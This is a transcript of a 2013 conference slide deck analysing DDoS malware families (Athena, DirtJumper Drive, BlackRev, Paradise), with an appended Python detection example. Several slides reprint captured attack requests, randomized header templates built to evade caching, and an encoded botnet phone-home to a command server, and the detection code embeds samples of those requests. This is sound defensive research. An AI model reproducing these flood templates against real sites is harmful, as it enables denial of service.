Advancements in DDoS Malware

This presentation explores advancements in DDoS Malware, based on research from Arbor Networks' ASERT security analyst Jason Jones. This presentation was originally shared at Usenix LEET '13.

Transcript

  • 1. Recent Advancements in DDoS Malware
    Jason Jones, Usenix LEET '13
  • 2. Agenda
    • Who am I?
    • Why?
    • What Hasn’t Changed
    • What Has Changed
      – Better Blending In & Hiding
      – Better Botnet Building
      – Better protection
    • Trends and Takeaways
  • 3. Who am I?
    • Jason Jones
      – Security Research Analyst on Arbor Networks’ ASERT
      – Presented at
        • BlackHat USA 2012
        • InfoSec Southwest 2013
      – Research interests
        • IP reputation
        • Malware clustering
        • Data mining
        • Graph Theory / Combinatorics
  • 4. ASERT Malware Corral
    • Arbor Security Engineering & Response Team
    • ASERT Malware Corral
      – Malware storage + processing system
      – Processing occurs via sandbox, static methods
      – Tagging via behavioral and static methods
    • Currently pulling in upwards of 100k samples / day
    • 567 unique family names tagged last year
      – Includes DDoS, Bankers, Infostealers, APT, etc.
  • 5. Why?
    • DDoS Becoming More of a Threat
      – SpamHaus
      – “Triple Crown”
      – Political Motivations
      – Anon Ops
      – Ransom
    • DDoS-specific Malware Evolving In Response to Our Response
  • 6. What Hasn’t Changed
  • 7. Still the same…
    • Most Malware Include
      – Basic GET/POST Flood
      – SYN and/or Connection Flood
      – UDP Flood
    • Lots of IRC CnC Still Around
    • Many use hard-coded set of user-agents
    • Still broken
      – Slowloris
      – ARME
  • 8. Still the same… (cont.)
    • .NET malware is still terrible
      – Most decompiles fine in .NET Reflector
      – Use .NET HTTP methods
      – Looks mostly the same for DDoS
    • Gh0st RAT variants still popular
    • Most are not fully protocol aware
    • Many don’t do SSL / HTTPS
    • Copy + Paste still prevalent
  • 9. What Has Changed
  • 10. Better Blending In & Hiding on the Network
    • HTTP CnC has always been popular
      – Tended to be plaintext
      – Athena recently moved from IRC -> HTTP
        • Obfuscates commands
        • Example:
          – a=%5A%47%5A%33%62%57%4E%6F%63%33%42%30%63%6D%56%32%65%47%70%70%59%57%39%78%59%6E%56%73%5A%32%74%75%65%6E%6B%36%5A%58%64%79%64%48%46%75%65%58%42%69%5A%6E%68%76%59%32%74%70%5A%33%5A%71%5A%47%78%36%61%48%56%74%63%32%45%3D
          – b=wHR5qGU6d25wZXnzY3c1gWQ6NGFuMWYsMtQ5OTE3ZDu0OTenMTu1MTQ5Yku4OWFzMTekZDY0wHBagXY6YWRbgW58YXJkgDp4ODZ8Z2VlZDpyYXB0d3B8Y29aZXM6MXcoqspXX1nQwHZzqkp2MS4rLkN8dtV0OkQlMHr%3D
          – c=%67%6E%75%62%7A%7A%7A%78%68%66%6A%6D%69%65%6C%71%6C%70%70%6D%62%7A%75%6Ex
      – Betabot employs encryption on phone-home
    • Adjustable phone-home intervals
      – Specify long intervals to avoid suspicion
  • 11. Better Blending In & Hiding on the Network (cont.)
    • More Intelligent HTTP Attacks
      – Requests look more legitimate now
        • Drive uses randomization in UA’s
        • Athena uses long list of legitimate UA’s
      – More dynamic headers
        • Paradise borrowed from Armageddon2
      – Ability to specify POST parameters
        • Target search boxes, login forms, etc.
        • Use up DB queries, server processing
        • Randomized per request, avoid caching
  • 12. Example – DirtJumper Drive POST Attack
    POST /test HTTP/1.1
    Host: 192.168.56.1:10000
    User-Agent: Opera/9.80 (Windows NT 6.1; U; Edition Bangladesh Local; ru) Presto/2.10.289 Version/8.06
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate
    Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
    Connection: Keep-Alive
    Referer: http://192.168.56.1:10000/
    Content-Length: 2443
    Content-Type: application/x-www-form-urlencoded

    login=q1un7q002imn2843b4qqmk29fsfyk883592qzn4jdgsguc2vy7sqpoi4mlujelbn5levvck21g6j265b48g6f59mocvnzm76en
    8rin3389c3epk3tgg89i4d796m85gt9hz0wjb4n19w00uh0m9t9xz8857506j08bj2a2r5203897du968e264456ci18b0d3flq2ka4a
    vq9j99e77d31pqcf668654e9xl74u3csa54ygcx45wbg67t47p2p326b00t4r2z99i07z9j2792c10f00l66dt5vnnf90z4xty7kpf1epb
    1y5l34fwk0939y4c98hs9y856pqc0k03249rfzl640983e35cmw9i607d4zz1k9x3njz2r0v84624566zfoq4afc8c7ku8r31d37ad58
    7cutfn4618476bnp822346s51sms408161jv7m69n2v5i1n4051t99uiru676596nao24j8dcse52a8dzdgcijz0khe0x7elf3w9c150
    2tjto4332fszyl424g3b911vc1026g79604035lbvk8h31v78b845rqj630ndd42946s18l4832b36ukd2pb917yr60q16e444m36wa
    9p2us9mj5b7ue4wv5e46m29l4ig8u9lf2wip8ogvv5q8eqj4rkw53k1fo277a3u1m5ca26xrv8fis4337z9p6wbp00u3jc2iq6i6f0rrr4
    c379x66p0e2z3y57s4kekk370h9w986yd8m5f7l2as0m090v96x42i14qdci43e444h8815jp923545719y2u3b5n450e9c036ws
    4643zvmp4663j8794w3h5yj71c324n12b3y96pi8487wv6z4xol0rkzq00jtpdgx05gidt8qt7ylyj36y40o2yzwh855x96ftw5qlagzpg
    2um99u7rap89fca26xrn90015msjbb5417kq037ssje971j8s159g68j0o30agjr2h9zg&.........

    Field/length template behind the body:
    login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]
  • 13. Example – BlackRev
    GET /index.html HTTP/1.1
    Host: victim.com
    Keep-Alive: 266
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
    Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.3
    Referer: http://victim.com/
    Cookie: PHPSESSID=t0gmf00id9bp4j9gvfsq87kq22; hotlog=1; __utma=226332163.1894789553.1362397126.1362926988.1363866277.4; __utmb=226332163.1.10.1363866277; __utmc=226332163; __utmz=226332163.1362397126.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
  • 14. Athena IRC + HTTP – HTTP Attack
    GET|POST|HEAD /<params> HTTP/1.1
    Host: <target>
    Range: bytes= <range bytes string>
    Connection: Keep-alive | close
    User-Agent: ObtainUserAgentString()
    Cache-Control: no-cache | no-store | no-transform | only-if-cached | max-age=0 | public | private | max-stale
    Vary: * | User-Agent
    Accept: text/*, text/html, text/html;level=1, */* | */* | text/plain; q=0.5, text/html, text/x-dvi; q=0.8, text/x-c | text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */* | * | application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5 | text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Charset: iso-8859-5, unicode-1-1;q=0.8 | * | UTF-8 | ISO-8859-1
    Accept-Encoding: * | gzip, deflate | compress;q=0.5, gzip;q=1.0 | gzip;q=1.0, identity; q=0.5, *;q=0 | compress, gzip
    Accept-Language: * | es | de | en-us,en;q=0.5 | en-us, en
    Content-Type: application/x-www-form-urlencoded | text/html; charset=ISO-8859-4 | text/html; charset=UTF-8 | application/xhtml+xml; charset=UTF-8 | image/gif
    Content-Length: <length>
    X-a: b
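As an added defender-side example (not code from the deck or from Arbor/ASERT), the two request shapes on slides 12 and 14 turned into detection checks: a Drive-style POST fills several of the hard-coded login-form field names with long random values, while Athena's attack template carries a literal X-a: b header, a Vary header in a request, and Accept-Charset/Accept-Language values drawn from its short fixed lists. The sample requests are constructed and the length/field thresholds are assumptions.

```python
from urllib.parse import parse_qsl

# Field names Drive fills with random strings (slide 12) and Athena's fixed
# header alternatives (slide 14). Sample requests are constructed, not captures.
DRIVE_FIELDS = {"login", "pass", "password", "log", "passwrd", "user",
                "username", "vb_login_username", "vb_login_md5password"}
ATHENA_CHARSETS = {"iso-8859-5, unicode-1-1;q=0.8", "*", "UTF-8", "ISO-8859-1"}
ATHENA_LANGUAGES = {"*", "es", "de", "en-us,en;q=0.5", "en-us, en"}

SAMPLE_DRIVE = ("POST /test HTTP/1.1\r\nHost: 192.168.56.1:10000\r\n"
                "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                "login=" + "q1un7q002i" * 100 + "&pass=" + "b4qqmk29fs" * 100
                + "&password=" + "fyk883592q" * 5 + "&user=" + "zn4jdgsguc" * 5)
SAMPLE_ATHENA = ("GET /index.php HTTP/1.1\r\nHost: victim.example\r\nRange: bytes=0-\r\n"
                 "Vary: User-Agent\r\nAccept-Charset: ISO-8859-1\r\n"
                 "Accept-Language: en-us, en\r\nX-a: b\r\n\r\n")
SAMPLE_LEGIT = ("POST /login HTTP/1.1\r\nHost: victim.example\r\n"
                "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                "username=alice&password=hunter2&remember=1")

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, headers, body); header names lower-cased."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method = lines[0].split(" ", 1)[0]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, headers, body

def looks_like_drive_post(raw, min_len=40, min_fields=3):
    """Drive hits login forms with several hard-coded field names, each carrying a long
    random alphanumeric value so every request dodges caches and costs a DB lookup.
    Thresholds are assumptions, not values from the deck."""
    method, headers, body = parse_request(raw)
    if method != "POST" or "x-www-form-urlencoded" not in headers.get("content-type", ""):
        return False
    values = [v for k, v in parse_qsl(body, keep_blank_values=True) if k in DRIVE_FIELDS]
    return len(values) >= min_fields and all(len(v) >= min_len and v.isalnum() for v in values)

def athena_template_score(raw):
    """Count traits of Athena's attack template: the literal 'X-a: b' header, a Vary
    header (a response header no browser puts in a request) and Accept-Charset /
    Accept-Language values from its short fixed lists. 3 or more is a strong match."""
    _, headers, _ = parse_request(raw)
    return sum([headers.get("x-a") == "b", "vary" in headers,
                headers.get("accept-charset") in ATHENA_CHARSETS,
                headers.get("accept-language") in ATHENA_LANGUAGES])
```

Both checks are per-request; in practice they are combined with a per-client rate so that a single odd request from a proxy does not trip them.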
  • 15. Example – Athena HTTP Phone Home
    POST /gate.php HTTP/1.1
    Host: panel-gc.co.uk:69
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727)
    Content-Length: 436

    a=%63%33%70%6e%62%58%52%68%62%6e%56%6f%62%32%4a%70%64%6d%4e%71%63%48%64%6b
    %63%58%68%72%63%6d%56%73%65%57%59%36%62%48%4e%6a%61%58%42%33%61%6e%46%6b
    %61%33%68%6c%65%57%5a%74%65%6d%64%30%59%57%35%6f%62%33%5a%69%63%6e%55%3d&c=
    %31%53%6a%52%31%4a%6e%6c%50%76%6d%73%52%6f%66%56%47%47%48%7a
    %77%53%51%6b&b=uHR5fGU6fiVgZWF0uHVzZDzgxilnMWdaNGFnx3zmYsbpOGnytXFgx3Q3ZXVdtjN2tXVjfG18fiFpOm
    M3uGJoX2pzxGnbZDkruGJoX2ZzxGVsOmJ8Yipuw2V5fsk0uGJ1f3h6ZiFlf2V8

    • |type:on_exec|uid:bac6cde8bbd9b242b7fa9f39b1198226f1a5|priv:admin|arch:x86|gend:laptop|cores:1|os:W_XP|ver:v1.0.3|net:4.0|
    • |type:repeat|uid:bac6cde8bbd9b242b7fa9f39b1198226f1a5|ram:25|bk_killed:0|bk_files:0|bk_keys:0|busy:false|
  • 16. Example – Paradise
    status=headers
    application/xml, image/png, text/html
    */*, text/html, text/html, application/xml
    text/x-dvi; q=.8; mxb=100000; mxt=5.0, text/x-c
    x-gzip, identity
    x-compress, x-zip, sdch
    x-compress ,deflate, gzip, x-gzip
    us-ua;q=0.5
    az-us;q=0.9
    Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6
    Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
    Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
    http://www.snpp.com/
    http://ask.fm/FlOoRNOoBlE
    http://www.thesimpsons.com/
    http://mylarha.deviantart.com/
    http://www.thesimpsonslatino.com/
  • 17. Building Better Botnets
    • Use What’s Readily Available
      – “Triple Crown” financial attacks
        • Tiered CnC Structure
        • Dynamically update code with new attacks
        • Can easily adjust attacks if current attack is unsuccessful
      – SpamHaus DNS Amplification
        • Open resolvers
        • Not botnet per se, but…
        • Highly successful
  • 18. Better Protections
    • Store attacks in external DLL
      – Paradise: Pulled down by main EXE
      – DLL is crypted
    • Restrict bots to geo regions
      – Also blackholing connections
    • Drop other malware on the same machine
    • Previously mentioned obfuscating / encrypting phone-home
    • More malware using encryption internal to binary
    • More packers / obfuscations used
  • 19. Better Protections (cont.)
    • More Junk Code
    • New Drive variant discards old phone home
      – 2-stage phone home
      – Base64 + underlying protection
      – 3 new attacks
      – Can now specify hard-coded or random Cookie vals
      – Still reversing…
      – Blog soon?
  • 20. Trends and Takeaways
  • 21. Trends and Takeaways
    • DDoS becoming more of a feature of larger families
      – Still plenty of standalone, but becoming more common in other malware
    • DNS amplification will likely make its way into malware soon
      – Too successful not to
      – Too easy not to
    • More booter services popping up
      – Many Athena HTTP CnC hostnames appear to be booter backends
    • Carberp source code leak will likely create a boom in Carberp variants similar to ZeuS
  • 22. More Trends and Takeaways…
    • Traditional botnets with DDoS addons don’t DDoS much
      – DarkComet
      – Some Athena HTTP used to mostly drop other malware
        • Nitol, Betabot, Andromeda, ZeuS
        • Appear to be botnet-for-hire types
    • Still waiting for the first SPDY-aware malware :)
    • Proper mobile DDoS botnet soon?
  • 23. Questions/Comments/Feedback
    • jasonjones@arbor.net
    • @jasonljones
    Thanks: Arbor/ASERT, Marc Eisenbarth, Alex Bardas
  • 24. Thank You!